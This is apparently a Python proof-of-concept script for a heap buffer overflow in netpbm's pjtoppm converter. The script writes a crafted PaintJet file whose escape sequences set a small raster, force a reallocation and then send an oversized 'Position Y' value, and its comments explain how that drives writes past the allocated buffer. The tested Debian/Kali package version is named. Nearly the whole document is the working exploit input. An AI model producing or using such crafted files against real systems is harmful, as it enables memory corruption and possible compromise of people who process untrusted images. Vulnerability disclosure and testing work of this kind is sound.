#!/usr/bin/env python3
# PoC: heap buffer overflow in netpbm pjtoppm via unbounded "Position Y" (ESC*p<n>Y)
# Tested against Debian/Kali netpbm 2:11.13.03+ds-2  (/usr/bin/pjtoppm)
ESC = b"\033"
out  = ESC + b"*b1M"               # transmission mode 1
out += ESC + b"*r100S"             # raster width = 100
out += ESC + b"*b2W" + b"\xff\xff" # send-last-plane val=2 -> REALLOCARRAY image/imlen to rowsX(100)*planes(3); row -> 1
out += ESC + b"*p100000Y"          # Position Y = 100000 -> loop writes image/imlen[row*3+plane] up to row 99999
open("poc_pjtoppm.pj", "wb").write(out)
print("wrote poc_pjtoppm.pj", len(out), "bytes")